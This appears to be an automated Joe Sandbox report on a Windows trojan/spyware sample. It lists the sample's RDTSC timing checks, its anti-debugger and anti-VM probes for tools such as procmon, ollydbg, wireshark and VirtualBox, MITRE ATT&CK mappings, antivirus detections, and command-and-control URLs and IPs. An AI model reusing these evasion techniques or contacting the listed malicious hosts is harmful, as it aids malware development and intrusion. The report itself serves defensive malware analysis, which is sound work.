Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010CBE second address: 7010D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 js 00007FEF4CCCE0CBh 0x0000000c jmp 00007FEEDCB1F6E2h 0x00000011 mov eax, dword ptr [ebp-04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov edi, 2C7CE3A0h 0x0000001c pushfd 0x0000001d jmp 00007FEEDCB1F6E9h 0x00000022 sub cx, 5AA6h 0x00000027 jmp 00007FEEDCB1F6E1h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010D19 second address: 7010D7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c jmp 00007FEEDCB2F2EEh 0x00000011 lea eax, dword ptr [ebx+70h] 0x00000014 jmp 00007FEEDCB2F2F0h 0x00000019 push 00000001h 0x0000001b jmp 00007FEEDCB2F2F0h 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FEEDCB2F2F7h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010D7E second address: 7010DBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEEDCB1F6E1h 0x0000000f nop 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEEDCB1F6DAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010DBB second address: 7010E2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 22C34DD1h 0x0000000e popad 0x0000000f lea eax, dword ptr [ebp-18h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FEEDCB2F2F9h 0x0000001b jmp 00007FEEDCB2F2EBh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FEEDCB2F2F8h 0x00000027 and ecx, 49EC99B8h 0x0000002d jmp 00007FEEDCB2F2EBh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010E2F second address: 7010E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FEEDCB1F6E5h 0x0000000b sub cx, 0456h 0x00000010 jmp 00007FEEDCB1F6E1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010E6B second address: 7010E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010E6F second address: 7010E82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010E82 second address: 7010E97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEEDCB2F2EAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010E97 second address: 7010EAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010EE2 second address: 7010F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 mov edi, eax 0x0000000b pushad 0x0000000c jmp 00007FEEDCB2F2F9h 0x00000011 pushad 0x00000012 mov dh, ch 0x00000014 push ebx 0x00000015 pop esi 0x00000016 popad 0x00000017 popad 0x00000018 test edi, edi 0x0000001a jmp 00007FEEDCB2F2F5h 0x0000001f js 00007FEF4CCDDA70h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FEEDCB2F2F8h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010F47 second address: 7010F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010F4B second address: 7010F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010F51 second address: 7010F62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010F62 second address: 7010F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010F66 second address: 7010F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-14h] 0x0000000b pushad 0x0000000c mov cx, bx 0x0000000f popad 0x00000010 mov ecx, esi 0x00000012 pushad 0x00000013 mov ebx, 05D68130h 0x00000018 popad 0x00000019 mov dword ptr [esi+0Ch], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FEEDCB1F6E2h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010F96 second address: 7010FE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, 772406ECh 0x0000000e jmp 00007FEEDCB2F2F6h 0x00000013 sub eax, eax 0x00000015 jmp 00007FEEDCB2F2F1h 0x0000001a lock cmpxchg dword ptr [edx], ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FEEDCB2F2EDh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010FE6 second address: 7011028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 movzx eax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEEDCB1F6E1h 0x00000013 or esi, 45FCF4D6h 0x00000019 jmp 00007FEEDCB1F6E1h 0x0000001e popfd 0x0000001f mov edi, esi 0x00000021 popad 0x00000022 test eax, eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7011028 second address: 7011037 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7011037 second address: 70110AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FEF4CCCDD5Eh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FEEDCB1F6DCh 0x00000016 or ch, FFFFFF88h 0x00000019 jmp 00007FEEDCB1F6DBh 0x0000001e popfd 0x0000001f push eax 0x00000020 pushad 0x00000021 popad 0x00000022 pop ebx 0x00000023 popad 0x00000024 mov edx, dword ptr [ebp+08h] 0x00000027 jmp 00007FEEDCB1F6E0h 0x0000002c mov eax, dword ptr [esi] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FEEDCB1F6E7h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70110AA second address: 70110BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov ch, bh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70110BD second address: 70110C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70110C1 second address: 70110D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Special instruction interceptor: First address: 1561974 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Special instruction interceptor: First address: 155F0AA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Special instruction interceptor: First address: 172E77D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Special instruction interceptor: First address: 156189F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_01069980 rdtsc 3_2_01069980
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00E8255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, 3_2_00E8255D
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_00E829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 3_2_00E829FF
Source: w6cYYyWXqJ.exe, w6cYYyWXqJ.exe, 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: w6cYYyWXqJ.exe, 00000003.00000003.1331595263.0000000000B51000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: w6cYYyWXqJ.exe | Binary or memory string: Hyper-V RAW
Source: w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: w6cYYyWXqJ.exe, 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: w6cYYyWXqJ.exe, 00000003.00000003.1452618989.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1453175602.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000002.1485095882.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1453323720.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1452487923.0000000000BA1000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1452581919.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1453357804.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | File opened: NTICE
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | File opened: SICE
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Code function: 3_2_01069980 rdtsc 3_2_01069980
Source: w6cYYyWXqJ.exe, w6cYYyWXqJ.exe, 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: FProgram Manager
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.7:49702 -> 5.101.3.217:80
MITRE ATT&CK matrix (number of matching signatures in parentheses):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (23); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (23); Process Discovery (13); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (11); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (4); Non-Application Layer Protocol (4); Application Layer Protocol (5); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Antivirus detection for the submitted sample:

Source | Detection | Scanner | Label
w6cYYyWXqJ.exe | 33% | Virustotal |
w6cYYyWXqJ.exe | 100% | Avira | TR/Crypt.TPM.Gen
w6cYYyWXqJ.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Antivirus detection for URLs:

Source | Detection | Scanner | Label
http://home.fiveth5ht.top/OyKvQ | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lse | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0e6 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | 0% | Avira URL Cloud | safe
Contacted domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5ht.top | 5.101.3.217 | true | false | | high
httpbin.org | 3.218.7.103 | true | false | | high
Contacted URLs:

Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | true | Avira URL Cloud: safe | unknown
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | true | Avira URL Cloud: safe | unknown
https://httpbin.org/ip | false | | high
URLs found in memory or binary data:

Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQ | w6cYYyWXqJ.exe, 00000003.00000002.1489724133.0000000007470000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://html4/loose.dtd | w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | w6cYYyWXqJ.exe | false | | high
https://httpbin.org/ipbefore | w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0e6 | w6cYYyWXqJ.exe, 00000003.00000002.1483886052.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1452487923.0000000000B51000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/http-cookies.html | w6cYYyWXqJ.exe, w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/hsts.html# | w6cYYyWXqJ.exe | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/alt-svc.html | w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.css | w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.jpg | w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lse | w6cYYyWXqJ.exe, 00000003.00000003.1453682176.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1453663304.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000002.1483267800.0000000000B49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs:

IP | Domain | Country | ASN | ASN Name | Malicious
5.101.3.217 | home.fiveth5ht.top | Russian Federation | 34665 | PINDC-ASRU | false
3.218.7.103 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581212
Start date and time: 2024-12-27 08:37:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: w6cYYyWXqJ.exe (renamed because the original name is a hash value)
Original Sample Name: 26e7c91d9fb68ef0ce54aabc0465a8b0.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          No simulations
Context for contacted IPs:

Match | Associated Sample Name / URL | Detection | Threat Name | Context
5.101.3.217 | mBr65h6L4w.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
5.101.3.217 | HrIrtCXI3s.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
3.218.7.103 | E6rBvcWFWu.exe | malicious | Unknown |

Context for contacted domains:

Match | Associated Sample Name / URL | Detection | Threat Name | Context
httpbin.org | mBr65h6L4w.exe | malicious | Unknown | 34.226.108.155
httpbin.org | HrIrtCXI3s.exe | malicious | Unknown | 34.226.108.155
httpbin.org | vJPhYDClT5.exe | malicious | Unknown | 34.226.108.155
httpbin.org | jklg6EIhyR.exe | malicious | Unknown | 34.226.108.155
httpbin.org | qr2JeuLuOQ.exe | malicious | Unknown | 34.226.108.155
httpbin.org | E6rBvcWFWu.exe | malicious | Unknown | 3.218.7.103
httpbin.org | gDPzgKHFws.exe | malicious | Cryptbot | 34.226.108.155
httpbin.org | HFoyAy1tg8.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
httpbin.org | 8kl5nJ3f9x.exe | malicious | Cryptbot | 98.85.100.80
httpbin.org | 7kf4hLzMoS.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
home.fiveth5ht.top | mBr65h6L4w.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | HrIrtCXI3s.exe | malicious | Unknown | 5.101.3.217

Context for contacted ASNs:

Match | Associated Sample Name / URL | Detection | Threat Name | Context
PINDC-ASRU | mBr65h6L4w.exe | malicious | Unknown | 5.101.3.217
PINDC-ASRU | HrIrtCXI3s.exe | malicious | Unknown | 5.101.3.217
PINDC-ASRU | 6ufJvua5w2.exe | malicious | CryptOne, Stealc, Vidar | 91.215.85.11
PINDC-ASRU | Ransomware Mallox.exe | malicious | Targeted Ransomware | 91.215.85.142
PINDC-ASRU | 3cb770h94r.elf | malicious | Okiru | 45.145.172.130
PINDC-ASRU | na.elf | malicious | Mirai | 5.188.210.194
PINDC-ASRU | na.elf | malicious | Mirai, Moobot | 5.8.21.138
PINDC-ASRU | lK1DKi27B4.dll | malicious | Unknown | 80.87.206.189
PINDC-ASRU | lK1DKi27B4.dll | malicious | Unknown | 80.87.206.189
PINDC-ASRU | https://trstwalsecu.com/ | malicious | Unknown | 91.215.85.16
AMAZON-AESUS | db0fa4b8db0333367e9bda3ab68b8042.x86.elf | malicious | Gafgyt, Mirai | 50.17.226.153
AMAZON-AESUS | mBr65h6L4w.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | HrIrtCXI3s.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | vJPhYDClT5.exe | malicious | Unknown | 34.226.108.155
